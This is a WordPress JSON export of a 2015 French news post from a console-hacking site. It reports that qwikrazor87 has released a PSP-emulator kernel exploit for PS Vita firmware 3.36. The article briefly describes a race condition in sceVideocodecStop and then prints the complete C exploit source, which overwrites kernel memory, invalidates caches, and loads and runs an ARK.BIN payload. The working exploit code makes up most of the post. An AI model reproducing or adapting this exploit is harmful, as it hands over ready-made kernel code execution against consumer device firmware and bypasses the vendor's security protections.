{"id":2812,"date":"2015-02-27T22:23:00","date_gmt":"2015-02-27T21:23:00","guid":{"rendered":"https:\/\/www.customprotocol.com\/?post_type=it_underground&amp;p=2812"},"modified":"2015-02-27T22:23:00","modified_gmt":"2015-02-27T21:23:00","slug":"qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36","status":"publish","type":"it_programmation","link":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","title":{"rendered":"Qwikrazor87 publie le code source de son kernel exploit pour firmware 3.36"},"content":{"rendered":"<p style=\"text-align: justify;\"><em>Qwikrazer87<\/em> - que l'on ne pr\u00e9sente plus - vient de publier \u00e0 tout le monde le code source de son <strong>exploit kernel PSP<\/strong> tournant sur les PS Vita en <em>firmware<\/em> 3.36 (le dernier \u00e0 l'heure actuelle). Bien \u00e9videmment r\u00e9serv\u00e9 aux d\u00e9veloppeurs les plus aguerris ou les plus curieux, cet \u00e9mulateur PSP utilise une vuln\u00e9rabilit\u00e9 au niveau de la fonction <em>sceVideocodecStop<\/em>, dont l'auteur avait d\u00e9j\u00e0 parl\u00e9 une fois en janvier sur son compte <em>Twitter <\/em>:<\/p>\n<div align=\"center\">\n<blockquote class=\"twitter-tweet\" lang=\"fr\">\n<p>props to anyone that can exploit sceVideocodecStop on 3.30+ (which will then allow the other \"patched\" exploits to work)&nbsp;\ud83d\ude00<\/p>\n<p>\u2014 qwikrazor87 (@qwikrazor87) <a href=\"https:\/\/twitter.com\/qwikrazor87\/status\/560590515964375040\">29 Janvier 2015<\/a><\/p>\n<\/blockquote>\n<\/div>\n<p>\n<script src=\"\/\/platform.twitter.com\/widgets.js\" async=\"\" charset=\"utf-8\"><\/script>\n<\/p>\n<p style=\"text-align: justify;\">Cette vuln\u00e9rabilit\u00e9 consiste en un remplissage de la m\u00e9moire tampon d'une vid\u00e9o \u00e0 l'aide d'un contenu sp\u00e9cifique, et semble s'appuyer sur une situation de comp\u00e9tition (ou <em>race condition<\/em>) o\u00f9 le contenu de la m\u00e9moire tampon est modifi\u00e9 dans une t\u00e2che (<em>thread<\/em>) \u00e0 part tandis que la fonction <em>sceVideoCodecStop<\/em> est appel\u00e9e. Si vous n'avez rien compris, ce n'est pas grave, regardez tout de m\u00eame en bas par curiosit\u00e9.&nbsp;\ud83d\ude1b<\/p>\n<pre class=\"lang:default decode:true\">#include \n\nu32 sceMeCodecWrapper&nbsp;=&nbsp;0x88136800, sw_address&nbsp;=&nbsp;0;\nint is_exploited&nbsp;=&nbsp;0, running&nbsp;=&nbsp;1;\nu32 a0[24];\n\nint storethread()\n{\n\twhile (running == 1) {\n\t\ta0[11]&nbsp;=&nbsp;sw_address;\n\t\tsceKernelDelayThread(1);\n\t}\n\n\tsceKernelExitThread(0);\n}\n\nvoid KernelContent()\n{\n\tis_exploited&nbsp;=&nbsp;1;\n\n\t__asm(\"move&nbsp;$k1,&nbsp;$0;\");\n\n\t\/\/\"restore\" me_wrapper mutex UID\n\tSceUID (* _sceKernelCreateMutex)(const char *name, u32 attr, int init_count, void *options)&nbsp;=&nbsp;\\\n\t\t(void *)FindExport(\"sceThreadManager\", \"ThreadManForUser\", 0xB7D098C6);\n\n\tSceUID mutex&nbsp;=&nbsp;_sceKernelCreateMutex(\"SceKermitMe\", 256, 0, NULL);\n\n\t_sw(mutex, sceMeCodecWrapper&nbsp;+&nbsp;0x2F80);\n\n\t\/\/sceKernelLibcTime - pass address of kernel function in first arg, restored later in ARK code. |:\n\t_sw(0x00800008, 0x8800F9C4);\t\/\/jr\t$a0\n\t_sw(0, 0x8800F9C8);\t\t\/\/nop\n\n\tvoid (* _sceKernelDcacheWritebackInvalidateAll)(void)&nbsp;=&nbsp;(void *)0x88000744;\n\tvoid (* _sceKernelIcacheInvalidateAll)(void)&nbsp;=&nbsp;(void *)0x88000E98;\n\n\t_sceKernelDcacheWritebackInvalidateAll();\n\t_sceKernelIcacheInvalidateAll();\n}\n\nvoid do_exploit()\n{\n\tis_exploited&nbsp;=&nbsp;0;\n\trunning&nbsp;=&nbsp;1;\n\n\tsw_address&nbsp;=&nbsp;(sceMeCodecWrapper&nbsp;+&nbsp;0x2F80) - 36;\n\n\tSceUID thid&nbsp;=&nbsp;sceKernelCreateThread(\"thid\", storethread, 8, 512, THREAD_ATTR_USER, NULL);\n\tsceKernelStartThread(thid, 0, NULL);\n\n\tsceUtilityLoadModule(0x300);\n\tsceUtilityLoadModule(0x303);\n\n\tint (* sceVideocodecStop)(u32 *a0, int a1)&nbsp;=&nbsp;(void *)FindImport(\"sceVideocodec\", 0xA2F0564E, 0);\n\n\tmemset(a0, 0, sizeof(a0));\n\n\ta0[0]&nbsp;=&nbsp;0x05100601;\n\ta0[15]&nbsp;=&nbsp;1;\n\n\tint i;\n\n\twhile (a0[2]&#8239;!= 0x800201C3) {\n\t\ta0[15]&nbsp;=&nbsp;1;\n\t\ta0[3]&nbsp;=&nbsp;0x09000000;\n\t\ta0[4]&nbsp;=&nbsp;0x09000000;\n\t\ta0[2]&nbsp;=&nbsp;0;\n\t\ta0[11]&nbsp;=&nbsp;0x09000000;\n\n\t\tsceVideocodecStop(a0, 0);\n\t}\n\n\tfillvram(-1);\n\n\tsw_address&nbsp;=&nbsp;0x8800F9C4 - 36;\n\n\tint (* _sceKernelLibcTime)(u32, u32)&nbsp;=&nbsp;(void *)sceKernelLibcTime;\n\n\twhile (is_exploited&#8239;!= 1) {\n\t\ta0[15]&nbsp;=&nbsp;1;\n\t\ta0[11]&nbsp;=&nbsp;0x09000000;\n\t\ta0[3]&nbsp;=&nbsp;0x09000000;\n\t\ta0[4]&nbsp;=&nbsp;0x09000000;\n\n\t\tsceVideocodecStop(a0, 0);\n\n\t\tsceKernelDcacheWritebackAll();\n\n\t\t_sceKernelLibcTime(0x08800000, ((u32)&amp;KernelContent | 0x80000000));\n\t}\n\n\tfillvram(0xFF00);\n\n\trunning&nbsp;=&nbsp;0;\n\n\tu8 buf[0x4000];\n\n\tSceUID fd&nbsp;=&nbsp;sceIoOpen(\"ms0:\/PSP\/SAVEDATA\/NPUG80320KEXPLOIT\/ARK.BIN\", PSP_O_RDONLY, 0777);\n\tsceIoRead(fd, buf, sizeof(buf));\n\tsceIoClose(fd);\n\n\tmemcpy((void *)0x10000, buf, sizeof(buf));\n\n\tsceKernelDcacheWritebackAll();\n\n\tvoid (* Start)(const char *)&nbsp;=&nbsp;(void *)0x10000;\n\tStart(\"ms0:\/PSP\/SAVEDATA\/NPUG80320KEXPLOIT\/\");\n}\n\nvoid _start() __attribute__ ((section (\".text.start\")));\nvoid _start()\n{\n\tfillvram(0x80808080);\n\tdo_exploit();\n\tsceKernelExitGame();\n}<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Le code source de l'\u00e9mulateur PSP bas\u00e9 sur le kernel exploit pour 3.36 de Qwikrazor87 est d\u00e9sormais publique.<\/p>\n","protected":false},"author":481,"featured_media":2813,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","format":"standard","meta":{"footnotes":""},"categories":[4,586,29,454,30],"tags":[],"programmation-categorie":[620],"class_list":["post-2812","it_programmation","type-it_programmation","status-publish","format-standard","has-post-thumbnail","hentry","category-news","category-news-programmation","category-news-underground","category-programmation","category-underground","programmation_categorie-code-source"],"yoast_head":"\n<title>Code source du kernel exploit pour 3.36 - Custom Protocol<\/title>\n<meta name=\"description\" content=\"Le code source de l&#039;\u00e9mulateur PSP bas\u00e9 sur le kernel exploit pour 3.36 de Qwikrazor87 est d\u00e9sormais publique.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Code source du kernel exploit pour 3.36 - Custom Protocol\" \/>\n<meta property=\"og:description\" content=\"Le code source de l&#039;\u00e9mulateur PSP bas\u00e9 sur le kernel exploit pour 3.36 de Qwikrazor87 est d\u00e9sormais publique.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\" \/>\n<meta property=\"og:site_name\" content=\"Custom Protocol\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.customprotocol.com\/medias\/2015\/02\/PSP-emulator-kernel-exploit-souce-code-qwikrazor87-illustration.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\",\"url\":\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\",\"name\":\"Code source du kernel exploit pour 3.36 - Custom Protocol\",\"isPartOf\":{\"@id\":\"https:\/\/www.customprotocol.com\/#website\"},\"datePublished\":\"2015-02-27T21:23:00+00:00\",\"dateModified\":\"2015-02-27T21:23:00+00:00\",\"description\":\"Le code source de l'\u00e9mulateur PSP bas\u00e9 sur le kernel exploit pour 3.36 de Qwikrazor87 est d\u00e9sormais publique.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.customprotocol.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Programmation\",\"item\":\"https:\/\/www.customprotocol.com\/programmation\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Qwikrazor87 publie le code source de son kernel exploit pour firmware 3.36\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.customprotocol.com\/#website\",\"url\":\"https:\/\/www.customprotocol.com\/\",\"name\":\"Custom Protocol\",\"description\":\"Site d&#039;hack-tualit\u00e9 et de tutoriels sur la customisation de consoles et appareils (homebrews, plugins, \u00e9mulation...)\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.customprotocol.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"}]}<\/script>\n","yoast_head_json":{"title":"Code source du kernel exploit pour 3.36 - Custom Protocol","description":"Le code source de l'\u00e9mulateur PSP bas\u00e9 sur le kernel exploit pour 3.36 de Qwikrazor87 est d\u00e9sormais publique.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","og_locale":"fr_CA","og_type":"article","og_title":"Code source du kernel exploit pour 3.36 - Custom Protocol","og_description":"Le code source de l'\u00e9mulateur PSP bas\u00e9 sur le kernel exploit pour 3.36 de Qwikrazor87 est d\u00e9sormais publique.","og_url":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","og_site_name":"Custom Protocol","og_image":[{"width":1280,"height":720,"url":"https:\/\/www.customprotocol.com\/medias\/2015\/02\/PSP-emulator-kernel-exploit-souce-code-qwikrazor87-illustration.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Estimation du temps de lecture":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","url":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","name":"Code source du kernel exploit pour 3.36 - Custom Protocol","isPartOf":{"@id":"https:\/\/www.customprotocol.com\/#website"},"datePublished":"2015-02-27T21:23:00+00:00","dateModified":"2015-02-27T21:23:00+00:00","description":"Le code source de l'\u00e9mulateur PSP bas\u00e9 sur le kernel exploit pour 3.36 de Qwikrazor87 est d\u00e9sormais publique.","breadcrumb":{"@id":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.customprotocol.com\/"},{"@type":"ListItem","position":2,"name":"Programmation","item":"https:\/\/www.customprotocol.com\/programmation\/"},{"@type":"ListItem","position":3,"name":"Qwikrazor87 publie le code source de son kernel exploit pour firmware 3.36"}]},{"@type":"WebSite","@id":"https:\/\/www.customprotocol.com\/#website","url":"https:\/\/www.customprotocol.com\/","name":"Custom Protocol","description":"Site d&#039;hack-tualit\u00e9 et de tutoriels sur la customisation de consoles et appareils (homebrews, plugins, \u00e9mulation...)","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.customprotocol.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"}]}},"_links":{"self":[{"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/programmation\/2812","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/programmation"}],"about":[{"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/types\/it_programmation"}],"author":[{"embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/users\/481"}],"replies":[{"embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/comments?post=2812"}],"version-history":[{"count":0,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/programmation\/2812\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/media\/2813"}],"wp:attachment":[{"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/media?parent=2812"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/categories?post=2812"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/tags?post=2812"},{"taxonomy":"programmation_categorie","embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/programmation-categorie?post=2812"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}